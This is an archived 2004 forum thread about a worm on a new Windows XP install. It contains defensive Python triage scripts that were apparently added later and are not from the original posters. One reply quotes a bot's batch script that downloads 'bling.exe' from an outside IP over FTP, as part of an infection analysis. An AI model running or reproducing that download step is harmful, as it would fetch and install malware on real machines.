A Windows XP help forum. PCbanter


Worm never seen before



 
 
#1
December 30th 04, 10:34 AM
I.L.B.
Subject: Worm never seen before

Hi all;

I am just experiencing a strange kind of infection; I don't know whether it is a
new worm or not, as I have never seen it before. The situation is as follows:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK.
- When I start an XP session and activate my network connection... I
start to see very heavy traffic on the LEDs of my ADSL hub/router. The
activity light is flickering like crazy... what is happening??
- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what is happening. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it! All of these netstat entries end at some strange
IPs at the EPMAP port.
- I run Task Manager, and I see a lot of started processes of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for the Sasser and Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks!!



#2
December 30th 04, 11:46 AM
Ashok S.
Subject: Worm never seen before


"I.L.B." wrote the following in a news message:
...
> Hi all;
>
> I am just experiencing a strange kind of infection; I don't know whether it is a
> new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I
> start to see very heavy traffic on the LEDs of my ADSL hub/router. The
> activity light is flickering like crazy... what is happening??
> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange
> IPs at the EPMAP port.
> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks!!



Scan for spyware programs. Use Ad-Aware or Spybot for it. Make sure your
antivirus is up to date. Scan for trojans as well; www.moosoft.com has a free
scanner. If your router has a built-in firewall, use it, or download one of
the many around. Zone Alarm has a free version.
Also see http://www.pacs-portal.co.uk/startup_content.php to see what
programs are running in Task Manager and what they are.
A good information site on firewalls:
http://computer.howstuffworks.com/firewall.htm
Ashok S.


#3
December 30th 04, 12:30 PM
bluddihun
Subject: Worm never seen before

I just tried the moosoft scanner and it seems to work OK, identifying a
small demonstration app I downloaded from Gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper', which is a legit process, as is
microsoft-ds (SMB).
svchost is the generic Windows services host process, and multiple instances
are normal.
As to the burst of data outbound, I don't know...
Good luck.

"I.L.B." wrote in message
...
> Hi all;
>
> I am just experiencing a strange kind of infection; I don't know whether it is a
> new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I
> start to see very heavy traffic on the LEDs of my ADSL hub/router. The
> activity light is flickering like crazy... what is happening??
> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange
> IPs at the EPMAP port.
> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks!!





#4
December 30th 04, 01:04 PM
Stan Goodman
Subject: Worm never seen before

On Thu, 30 Dec 2004 09:34:57 UTC, "I.L.B." opined:

> Hi all;
>
> I am just experiencing a strange kind of infection; I don't know whether it is a
> new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I
> start to see very heavy traffic on the LEDs of my ADSL hub/router. The
> activity light is flickering like crazy... what is happening??
> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange
> IPs at the EPMAP port.
> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks!!


Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
#5
December 30th 04, 01:18 PM
Lars M. Hansen
Subject: Worm never seen before

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh

> Perhaps the system is calling home to tell Uncle Bill what you had for
> breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
> fall from the sky but Uncle Bill wants to know all about it.


Bullsh*t.

Lars M. Hansen
http://www.hansenonline.net
(replace 'badnews' with 'news' in e-mail address)
#6
December 30th 04, 04:23 PM
Beauregard T. Shagnasty
Subject: Worm never seen before

In alt.comp.virus, I.L.B. wrote:

> Hi all
> I am just experiencing a strange kind of infection; I don't know whether it is a
> new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I
> start to see very heavy traffic on the LEDs of my ADSL hub/router. The
> activity light is flickering like crazy... what is happening??

Hub/router? Do you mean the DSL modem? It is neither a hub nor a
router. You should have a real router between the DSL modem and your
computer.

> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...

Ah. I'd bet that your computer is compromised and has become a zombie
for spammers. You are likely relaying spam. (Nearly 3/4 of the spam I
receive comes from someone's broadband connection.)

If you had a software firewall that monitored outgoing traffic, you
could block it. If you had a firewall, you probably wouldn't be infected.

> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange
> IPs at the EPMAP port.

...probably the spammer's connection to you.

> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't have
> these worms on my computer...

What tools did you use?

http://home.rochester.rr.com/bshagna...s.html#spyware

--
-bts
-This space intentionally left blank.
#7
December 30th 04, 04:56 PM
I.L.B.
Subject: This is really strange...

Thanks guys, but I just ran the scanners you told me about with no results....

This is really strange: it keeps happening! It happened just after
reinstalling Windows XP, when trying to update it to SP1 and SP2.... that's
when the outbound bursts began. I can turn off the network connection and
restart it again... then after a few seconds, the bursts of outgoing packets
start... when running NETSTAT, I see first an ESTABLISHED connection to
"unknown.sagonet.net:6667" (to an IRC port!!!), then comes the stream of
outbound packets, from ports 3000 to 4000 and so on... with no end!! In the
meanwhile I have no access to web surfing or anything regular, just bursts of
TCP packets flying away from my computer.

And it happened just when I reinstalled XP, so there wasn't time to download
any virus or worm or anything.

If that sounds familiar to any of you, please help me. Thanks...



"I.L.B." wrote in message
...
> Hi all;
>
> I am just experiencing a strange kind of infection; I don't know whether it is a
> new worm or not, as I have never seen it before. The situation is as follows:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK.
> - When I start an XP session and activate my network connection... I
> start to see very heavy traffic on the LEDs of my ADSL hub/router. The
> activity light is flickering like crazy... what is happening??
> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it! All of these netstat entries end at some strange
> IPs at the EPMAP port.
> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for the Sasser and Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks!!
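The two symptoms reported in this post and in the first one (an ESTABLISHED session to port 6667, then a spray of SYN_SENT entries from climbing local ports towards port 135 on many different hosts) are both visible in plain `netstat -an` output, and a short script can pull them out faster than reading the list by eye. The following is an added example and not code from anyone in this thread: it parses the column layout that Windows XP's `netstat -an` prints and flags the two patterns. Every address in the embedded sample is constructed, and the port tables and the `min_hosts` threshold are the example's own choices rather than anything from the posts.

```python
"""Triage of Windows `netstat -an` output for an outbound SYN spray to one
remote port and an ESTABLISHED session to an IRC port.  Added example; not
code from the thread's posters."""
import re
from collections import defaultdict

# Constructed sample in the column layout Windows XP's `netstat -an` prints.
# 192.168.1.5 is the local host; all remote addresses are documentation ranges.
_HEADER = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1044       203.0.113.20:6667      ESTABLISHED
  TCP    192.168.1.5:1050       203.0.113.80:80        ESTABLISHED
"""
# Twelve half-open connections from consecutive local ports to port 135 on
# twelve different hosts: the shape of a worm hunting for RPC targets.
_SPRAY = "".join(
    f"  TCP    192.168.1.5:{3400 + i:<5}      198.51.100.{i + 1}:135        SYN_SENT\n"
    for i in range(12)
)
SAMPLE_NETSTAT = _HEADER + _SPRAY + "  UDP    192.168.1.5:137        *:*\n"

# Proto, local endpoint, remote endpoint, optional state (UDP rows have none).
_ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")

# Remote ports worth a second look when a session to them is ESTABLISHED.
C2_PORTS = {6667: "IRC (classic bot command channel)"}
# Remote ports that the 2003-2004 generation of worms sprayed SYNs at.
WORM_TARGET_PORTS = {135: "epmap / DCOM RPC", 139: "netbios-ssn", 445: "microsoft-ds / SMB"}


def _split_endpoint(endpoint):
    """'10.0.0.1:135' -> ('10.0.0.1', 135); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port) if port.isdigit() else None


def parse_netstat(text):
    """Return one dict per connection row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW_RE.match(line)
        if not m:
            continue
        proto, local, remote, state = m.groups()
        lhost, lport = _split_endpoint(local)
        rhost, rport = _split_endpoint(remote)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "rhost": rhost, "rport": rport, "state": state})
    return rows


def triage(rows, min_hosts=5):
    """Flag (a) ESTABLISHED sessions to known C2 ports and (b) SYN sprays: the
    same remote port half-open to at least `min_hosts` distinct hosts."""
    findings = []
    spray = defaultdict(lambda: {"hosts": set(), "lports": []})
    for r in rows:
        if r["proto"] != "TCP":
            continue
        if r["state"] == "ESTABLISHED" and r["rport"] in C2_PORTS:
            findings.append({"kind": "c2_channel",
                             "remote": f"{r['rhost']}:{r['rport']}",
                             "service": C2_PORTS[r["rport"]]})
        elif r["state"] == "SYN_SENT" and r["rport"] is not None:
            spray[r["rport"]]["hosts"].add(r["rhost"])
            spray[r["rport"]]["lports"].append(r["lport"])
    for port, info in sorted(spray.items()):
        if len(info["hosts"]) >= min_hosts:
            findings.append({"kind": "syn_spray", "remote_port": port,
                             "service": WORM_TARGET_PORTS.get(port, "unknown"),
                             "distinct_hosts": len(info["hosts"]),
                             "local_ports": (min(info["lports"]), max(info["lports"]))})
    return findings


def triage_netstat(text, min_hosts=5):
    """Convenience wrapper: raw `netstat -an` text in, findings out."""
    return triage(parse_netstat(text), min_hosts)


if __name__ == "__main__":
    for finding in triage_netstat(SAMPLE_NETSTAT):
        print(finding)
```

On a live machine the input would come from `netstat -an > netstat.txt` fed to `triage_netstat`. The number of distinct remote hosts is what separates a worm looking for targets from a merely busy client: a browser or mail client keeps a handful of connections to a few hosts, while a scanner opens one half-connection per host and walks through the address space, which is why the local port in the original post climbs steadily from 3400 upward.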





#8
December 30th 04, 05:30 PM
Beauregard T. Shagnasty
Subject: This is really strange... [was: Worm never seen before]

In alt.comp.virus, I.L.B. wrote:

[Stop changing the Subject line.]

> Thanks guys, but I just ran the scanners you told me about with no
> results....
>
> This is really strange: it keeps happening! It happened just after
> reinstalling Windows XP, when trying to update it to SP1 and SP2....

Did you have your *firewall* turned on *before* going on line?

http://www.theregister.co.uk/2004/08/19/infected_in20_minutes/

--
-bts
-This space intentionally left blank.
#9
December 30th 04, 05:47 PM
Gerard Bok
Subject: Worm never seen before

On Thu, 30 Dec 2004 11:30:28 GMT, "bluddihun" wrote:

> I just tried the moosoft scanner and it seems to work OK, identifying a
> small demonstration app I downloaded from Gibson's Shields Up.
> I also really wondered about the ports I found open with netstat, but it
> turns out epmap is the 'endpoint mapper', which is a legit process, as is
> microsoft-ds (SMB).
> svchost is the generic Windows services host process, and multiple instances
> are normal.

True.
But that does not mean that one (or more) of the svchost
instances are caused by a worm or other malware :-)

(Why write the entire virus when you have Windows available :-)

> As to the burst of data outbound, I don't know...


--
Kind regards,
Gerard Bok
#10
December 30th 04, 06:04 PM
John Coutts
Subject: This is really strange...

It sounds like one of the many variants of the SpyBot backdoor trojan.
Typically, what these worms do is set up a connection to an IRC chat channel on
port 6667 to listen for further instructions. They can be very sophisticated in
that they will hide themselves and re-establish themselves when removed. For
example, I found one called bling.exe. This program was used to install
mswin.exe and msdll.gif. mswin.exe was an IRC proxy program, and
msdll.gif was the configuration file used to load it. Another program was
loaded called hidden32.exe, and this was used to load the IRC program and
hide it from the task list. It also loaded its own kernel32.exe, of which
there may be multiple copies running. mswin.exe was instructed which one to
use from the file mybot.pid, which stored the Process ID. The IRC proxy
program sat idle for 10 days, and then one day when I logged in under an
administrator account, it activated an open FTP server program called U-SERV.

All this was accomplished using a Microsoft vulnerability on port 445. It
was able to activate a TFTP session and run a batch file simply called "o",
which was then used to download the bling.exe file:

open 142.149.31.32 22187
user 1 1
get bling.exe
quit

Removing bling.exe will not remove the established IRC proxy. As a matter of
fact, every time the proxy program was removed it would reactivate through a
series of batch files. I had to boot up in safe mode, remove the registry
entries, and then physically remove the backdoor programs from the %system%
directory. Only then could I safely boot up in normal mode without reactivating
the proxy program.

J.A. Coutts
*************** REPLY SEPARATOR ****************
In article , says...

> Thanks guys, but I just ran the scanners you told me about with no results....
>
> This is really strange: it keeps happening! It happened just after
> reinstalling Windows XP, when trying to update it to SP1 and SP2.... that's
> when the outbound bursts began. I can turn off the network connection and
> restart it again... then after a few seconds, the bursts of outgoing packets
> start... when running NETSTAT, I see first an ESTABLISHED connection to
> "unknown.sagonet.net:6667" (to an IRC port!!!), then comes the stream of
> outbound packets, from ports 3000 to 4000 and so on... with no end!! In the
> meanwhile I have no access to web surfing or anything regular, just bursts of
> TCP packets flying away from my computer.
>
> And it happened just when I reinstalled XP, so there wasn't time to download
> any virus or worm or anything.
>
> If that sounds familiar to any of you, please help me. Thanks...
>
> "I.L.B." wrote in message
> ...
>> Hi all;
>>
>> I am just experiencing a strange kind of infection; I don't know whether it is a
>> new worm or not, as I have never seen it before. The situation is as follows:
>>
>> - I am running a computer with both Win98 and XP installed.
>> - My Win98 session works OK.
>> - When I start an XP session and activate my network connection... I
>> start to see very heavy traffic on the LEDs of my ADSL hub/router. The
>> activity light is flickering like crazy... what is happening??
>> - I check the Status of the connection, and I see dozens of outbound packets
>> per second, and almost nothing incoming. Strange...
>> - I run NETSTAT to see what is happening. I see a LOT of outbound TCP
>> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
>> on... no way to stop it! All of these netstat entries end at some strange
>> IPs at the EPMAP port.
>> - I run Task Manager, and I see a lot of started processes of "SVCHOST" and
>> "IEEXPLORE" (about 5 or 6 instances of each one started).
>>
>> I just checked for the Sasser and Welchia worms, but the tools said I don't have
>> these worms on my computer...
>>
>> Any ideas? Thanks!!
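The cleanup J.A. Coutts describes above (Run-key entries plus a set of files in the %system% directory, some of them named to pass as Windows components) goes faster with a pass over an exported Run key and a directory listing. The script below is an added example and not his code: it works on constructed `reg query` and `dir /b` text, uses the file names his post lists as its indicator set, and adds one generic rule of its own, an .exe that carries the name of a core Windows DLL. The registry value names in the sample are invented.

```python
"""Cross-check Run-key autostart entries against a system-directory listing
for the file names the post lists and for DLL-name masquerades.  Added example;
the registry text and directory listing are constructed."""
import re
from pathlib import PureWindowsPath

# Constructed `reg query` output in the tab-separated layout XP's REG.EXE prints;
# the value names are invented, the image names come from the post.
SAMPLE_REG_QUERY = """\
! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    Microsoft Update\tREG_SZ\tC:\\WINDOWS\\system32\\mswin.exe
    Windows Hidden Loader\tREG_SZ\tC:\\WINDOWS\\system32\\hidden32.exe
    Vendor Tray Applet\tREG_SZ\t"C:\\Program Files\\Vendor\\tray.exe" /tray
    Kernel Service\tREG_SZ\tC:\\WINDOWS\\system32\\kernel32.exe -s
"""

# Constructed `dir /b %SystemRoot%\system32` excerpt.
SAMPLE_SYSTEM32_LISTING = """\
advapi32.dll
bling.exe
hidden32.exe
kernel32.dll
kernel32.exe
msdll.gif
mswin.exe
mybot.pid
ntdll.dll
svchost.exe
"""

# Indicator set: exactly the file names named in the post, nothing more.
POST_IOCS = {"bling.exe", "mswin.exe", "hidden32.exe", "kernel32.exe", "msdll.gif", "mybot.pid"}
# Base names of core Windows DLLs; a same-named .exe has no legitimate reason to exist.
CORE_DLLS = {"kernel32", "ntdll", "user32", "advapi32", "gdi32"}

# One registry value line: indented name, REG_* type, data.
_VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")


def parse_run_key(text):
    """Return (value name, value data) pairs from `reg query` output."""
    return [(m["name"], m["data"]) for m in map(_VALUE_RE.match, text.splitlines()) if m]


def image_path(data):
    """Executable path from value data: honour quoting, drop trailing arguments."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ")[0]


def masquerading_files(listing_text):
    """Executables in the listing whose base name is that of a core DLL."""
    names = sorted(n.lower() for n in listing_text.split())
    return [n for n in names if n.endswith(".exe") and n[:-4] in CORE_DLLS]


def triage_autostarts(reg_text, listing_text):
    """Flag autostart entries by the post's indicators and by DLL-name masquerade,
    and report which indicator files are actually present on disk."""
    present = {n.lower() for n in listing_text.split()}
    findings = []
    for value_name, data in parse_run_key(reg_text):
        path = PureWindowsPath(image_path(data))
        base = path.name.lower()
        reasons = []
        if base in POST_IOCS:
            reasons.append("file name is one of the post's indicators")
        if path.suffix.lower() == ".exe" and path.stem.lower() in CORE_DLLS:
            reasons.append("executable named after a core Windows DLL")
        if reasons:
            findings.append({"value": value_name, "image": str(path),
                             "on_disk": base in present, "reasons": reasons})
    return {"autostarts": findings,
            "ioc_files_present": sorted(present & POST_IOCS),
            "dll_name_executables": masquerading_files(listing_text)}


if __name__ == "__main__":
    report = triage_autostarts(SAMPLE_REG_QUERY, SAMPLE_SYSTEM32_LISTING)
    for entry in report["autostarts"]:
        print(entry)
    print("indicator files on disk:", report["ioc_files_present"])
    print("DLL-named executables:", report["dll_name_executables"])
```

The point of reporting the autostart entries and the on-disk files separately is the one the post makes: deleting the file alone leaves the registry entry to complain or to be re-created by a companion loader, and deleting the registry entry alone leaves the file for another loader to re-register, so both lists have to be cleared in the same safe-mode session. Only the HKLM Run key is shown; the HKCU Run key, RunOnce and the Services key deserve the same pass.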






#11
December 30th 04, 06:13 PM
Stan Goodman
Subject: Worm never seen before

On Thu, 30 Dec 2004 12:18:06 UTC, Lars M. Hansen opined:

> On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh
>
>> Perhaps the system is calling home to tell Uncle Bill what you had for
>> breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
>> fall from the sky but Uncle Bill wants to know all about it.
>
> Bullsh*t.


There's no "I" on your keyboard?

=;-/8

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
#12
December 30th 04, 08:07 PM
I.L.B.
Subject: How I solved this...

Finally... I had to download a standalone Service Pack 2 for XP... that
includes improved security, firewalls, etc., and now my XP is back to normal
life again.

So the XP I got is risky! It begins to do strange things just after being
installed, and it needs to be "servicepacked" ASAP!!!

Jesus!


#13
December 30th 04, 08:09 PM
Jason Edwards
Subject: Worm never seen before

"Bart Bailey" wrote in message
...
> In posted on Thu, 30 Dec 2004 10:23:19 -0500, Beauregard T. Shagnasty wrote: Begin
>
>> You should have a real router between the DSL modem and your
>> computer.
>
> Why?

It depends on what is meant by a real router.
A NAT router will ignore incoming connection requests and will not forward
them to your PC unless it is set up to do port forwarding.
Some DSL modems (which use telephone lines) have built-in NAT routers, but
I've yet to come across a cable modem (which uses a TV cable) that does.

Why is a NAT router a good idea?
Because when you're setting up a freshly installed Windows 2000 or Windows
XP PC it will take about 30 seconds to get a worm infection if you don't
have a separate box between you and the Internet which blocks incoming
connection requests.
There are two ways around this when doing a reinstall, but almost no one uses
them because 1 is too easy to forget and 2 is too difficult.
1. Turn on the built-in firewall in XP BEFORE you connect to the
Internet/modem.
2. Make yourself a CD with the most recent service pack slipstreamed in.

In the time it took to write this I have logged five incoming TCP port 135
connection requests.

http://www.google.com/search?&q=tcp+port+135+blaster

Jason

> --
>
> Bart
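Jason's "five incoming TCP port 135 connection requests" is the kind of figure a firewall log gives you, and it is the number that decides whether an unfirewalled fresh install survives long enough to fetch a service pack. The script below is an added example, not Jason's or Microsoft's code: it reads the `pfirewall.log` layout that Windows Firewall writes (a `#Fields:` header line followed by space-separated records, with the field names taken from that header rather than hard-coded), counts dropped inbound TCP SYNs per destination port and estimates a probe rate. All log lines in it are constructed.

```python
"""Count the inbound connection attempts a Windows Firewall log has dropped,
per destination port, and estimate how often they arrive.  Added example; the
records below are constructed, and the column names come from the #Fields:
header in the log rather than from assumptions."""
from collections import defaultdict
from datetime import datetime

# Constructed pfirewall.log excerpt; 192.168.1.5 is the host, the rest are
# documentation-range addresses.  Seven inbound SYNs over 4.5 minutes.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2004-12-30 14:10:02 DROP TCP 198.51.100.7 192.168.1.5 4521 135 48 S 1839402175 0 16384 - - - RECEIVE
2004-12-30 14:10:41 DROP TCP 203.0.113.9 192.168.1.5 2217 135 48 S 2294877 0 65535 - - - RECEIVE
2004-12-30 14:11:15 OPEN TCP 192.168.1.5 203.0.113.80 1050 80 - - - - - - - - SEND
2004-12-30 14:11:53 DROP TCP 198.51.100.7 192.168.1.5 4588 445 48 S 1839412601 0 16384 - - - RECEIVE
2004-12-30 14:12:30 DROP TCP 192.0.2.44 192.168.1.5 1099 135 48 S 77122045 0 8192 - - - RECEIVE
2004-12-30 14:13:04 DROP UDP 192.0.2.44 192.168.1.255 137 137 78 - - - - - - - RECEIVE
2004-12-30 14:13:48 DROP TCP 203.0.113.9 192.168.1.5 2290 135 48 S 2301133 0 65535 - - - RECEIVE
2004-12-30 14:14:10 DROP TCP 198.51.100.200 192.168.1.5 3188 445 48 S 4095581 0 16384 - - - RECEIVE
2004-12-30 14:14:32 DROP TCP 192.0.2.101 192.168.1.5 1472 135 48 S 6108829 0 8192 - - - RECEIVE
"""


def parse_firewall_log(text):
    """Return one dict per record, keyed by the names in the #Fields: header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log record before #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated record, e.g. written while the log rolled over
        rec = dict(zip(fields, values))
        rec["when"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def inbound_syn_probes(records):
    """Dropped inbound TCP SYNs (new connection requests), grouped by destination port."""
    by_port = defaultdict(lambda: {"count": 0, "sources": set(), "first": None, "last": None})
    for r in records:
        if (r["action"], r["path"], r["protocol"]) != ("DROP", "RECEIVE", "TCP"):
            continue
        flags = r["tcpflags"]
        if "S" not in flags or "A" in flags:  # SYN without ACK is a fresh request
            continue
        entry = by_port[int(r["dst-port"])]
        entry["count"] += 1
        entry["sources"].add(r["src-ip"])
        entry["first"] = r["when"] if entry["first"] is None else min(entry["first"], r["when"])
        entry["last"] = r["when"] if entry["last"] is None else max(entry["last"], r["when"])
    return dict(by_port)


def probe_rate_per_minute(by_port):
    """Total probes divided by the span between the earliest and latest one."""
    if not by_port:
        return 0.0
    total = sum(e["count"] for e in by_port.values())
    span = (max(e["last"] for e in by_port.values())
            - min(e["first"] for e in by_port.values())).total_seconds()
    return float(total) if span == 0 else total * 60.0 / span


if __name__ == "__main__":
    probes = inbound_syn_probes(parse_firewall_log(SAMPLE_LOG))
    for port, e in sorted(probes.items()):
        print(f"port {port}: {e['count']} requests from {len(e['sources'])} sources")
    print(f"about {probe_rate_per_minute(probes):.1f} probes per minute")
```

Reading the field names from the header is what keeps the parser honest across log versions; the `OPEN ... SEND` line and the UDP broadcast are there to show that only dropped inbound SYNs are counted. With the firewall on, these are just log lines; with it off, as Jason says, the first of them that lands on an unpatched port 135 or 445 is the infection.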



#14
December 30th 04, 08:16 PM
Beauregard T. Shagnasty
Subject: How I solved this...

Please don't start new threads when you really wanted to reply to your
other message.

In alt.comp.virus, I.L.B. wrote:
> Finally... I had to download a standalone Service Pack 2 for XP...
> that includes improved security, firewalls, etc., and now my XP is
> back to normal life again.

We will see...

> So the XP I got is risky! It begins to do strange things just after being
> installed, and it needs to be "servicepacked" ASAP!!!

No it doesn't, but it does need to be firewalled before ever
connecting to the internet.

> Jesus!

Yes. Does your XP SP2 *really* have:
X-Newsreader: Microsoft Outlook Express 5.00.2919.6600

or are you posting from some other ancient machine?

--
-bts
-This space intentionally left blank.
#15
December 30th 04, 09:57 PM
Robert
Subject: Worm never seen before

On Fri, 31 Dec 2004 20:32:56 +0100, Gabriele Neukam wrote:

> Good idea. If I (ever?) get one, it will be behind a broadband router
> with NAT (already there), and I'll never browse with IE, or mail with
> OE. Remember how it was announced: "The safest Windows ever". Now it is
> the most often(ly?) attacked and corrupted one.

Two things that do not go together: Microsoft and Security


--

Regards
Robert

Smile... it increases your face value!

 




Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright ©2004-2024 PCbanter.
The comments are property of their posters.